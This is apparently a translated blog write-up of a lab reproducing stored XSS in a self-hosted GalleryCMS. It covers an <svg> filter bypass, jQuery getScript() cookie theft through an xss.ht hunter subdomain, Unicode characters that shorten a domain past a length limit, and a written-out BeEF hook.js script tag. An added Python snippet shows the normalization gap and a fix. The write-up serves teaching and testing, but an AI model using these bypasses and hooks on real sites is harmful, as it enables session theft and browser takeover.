XSS vulnerability reproduction
2022-08-03 21:11:00 【hug kitten】
Contents
- XSS reproduction: GalleryCMS character-length limit and short-domain-name bypass
- Step 1: Upload an arbitrary string and see where it ends up
- Step 2: Test again to see whether JS code executes
- Step 3: Bypass using the getScript() function
- Step 4: Reproducing the GalleryCMS 20-character limit bypass with BeEF and a short domain name

XSS reproduction: GalleryCMS character-length limit and short-domain-name bypass
First we set up a GalleryCMS server.

Step 1: Upload an arbitrary string and see where it ends up

The string we uploaded can be seen in the database.
Step 2: Test again to see whether JS code executes
The database shows the payload as displayed, which indicates that JS code is being restricted; as a result we cannot trigger the pop-up window.
Looking at the source code, we can see that it limits our input length to 45 and filters a large number of tags and other constructs.

However, the source code shows that there is no restriction on the <svg> tag, so we test whether <svg> can be used to bypass the filter.

Bypass successful:

Step 3: Bypass using the getScript() function
From this page we find that the site uses the jQuery framework, so we try to bypass the filter with the getScript() function.
getScript() function: loads and executes JavaScript using an AJAX HTTP GET request.
Syntax: (selector).getScript(url, success(response, status))
| Parameter | Description |
|---|---|
| url | Required. Specifies the URL to which the request is sent. |
| success(response, status) | Optional. Specifies the function to run when the request succeeds. Additional parameters: |
We try combining the <svg> tag with getScript to obtain the cookie value.

We used a page assigned by the xss-hunter system, telsm.xss.ht. It has many functions for obtaining information; it requires registration and has a custom domain, xss.ht, of which only subdomains can be used. But I didn't register the domain name, so I can't see the information that was obtained; still, it also means success.

Step 4: Reproducing the GalleryCMS 20-character limit bypass with BeEF and a short domain name
We changed the maximum character limit to 20 characters and try to bypass it using the BeEF tool.

But the basic payloads exceed 20 characters.
Given the character-length limit, how can we bypass it?
1. Use Unicode encoding: Unicode has several special characters that expand to multiple letters, for example tel counts as only one character in Unicode.
2. Domain redirection: redirecting through a domestic domain name requires ICP filing, so only foreign domain names can be used.
We use the first method, bypassing the limit with special Unicode characters:
- ℠ expands to sm
- ㏛ expands to sr
- st expands to st
- ㎭ expands to rad
- ℡ expands to tel
First we start beef-xss:
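As an added illustration (not code from the original article), the following Python shows how the compatibility characters listed above expand under NFKC normalization, which is the mapping a browser applies to a hostname before resolving it, and how a filter that counts raw code points undercounts the payload the browser actually sees. The hostname telsm.xss.ht is the one used in the article; the filter limit is a constructed value.

```python
import unicodedata


def normalize_host(host):
    """Fold a hostname the way a browser's IDNA/UTS#46 mapping does before
    resolving it: NFKC compatibility decomposition, then case folding.
    Compatibility characters such as U+2121 TELEPHONE SIGN expand from one
    code point to several ASCII letters ("TEL" -> "tel")."""
    return unicodedata.normalize("NFKC", host).casefold()


def expanding_chars(text):
    """Return (char, folded) pairs for every character that becomes more
    than one character after NFKC + casefold. These are exactly the
    characters a raw code-point length filter undercounts."""
    pairs = []
    for ch in text:
        folded = unicodedata.normalize("NFKC", ch).casefold()
        if len(folded) > 1:
            pairs.append((ch, folded))
    return pairs


def audit_length(payload, limit):
    """Compare the length a naive filter counts (raw code points) with the
    length effectively seen after NFKC. A payload that fits the limit raw
    but not after normalization should be rejected (normalize first) or at
    least logged as a length-limit bypass attempt."""
    canonical = unicodedata.normalize("NFKC", payload)
    return {
        "raw_len": len(payload),
        "canonical_len": len(canonical),
        "expansions": expanding_chars(payload),
        "passes_raw_filter": len(payload) <= limit,
        "passes_normalized_filter": len(canonical) <= limit,
    }


if __name__ == "__main__":
    # Constructed sample: the article's hostname written with U+2121 in
    # place of "tel"; the limit 25 is a constructed value the raw payload
    # just fits, so the gap between the two filters is visible.
    sample = '<script src=//\u2121sm.xss.ht>'
    print(normalize_host("\u2121sm.xss.ht"))  # telsm.xss.ht
    for ch, folded in expanding_chars("\u2120\u33db\ufb06\u33ad\u2121"):
        print(f"U+{ord(ch):04X} {ch} -> {folded}")
    print(audit_length(sample, 25))
```

A server-side filter that normalizes (NFKC) before measuring length or matching tags closes the gap this example demonstrates.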

Log in to the BeEF web UI; the BeEF username and password can be found in the /etc/beef-xss/config.yml file.

Copy the contents of hook.js into the server's /var/www/html/index.html file. Because I don't have my own domain name, I modified the configuration file myself and tested with an IP: <script src="//192.168.112.131:3000/hook.js">
Success.

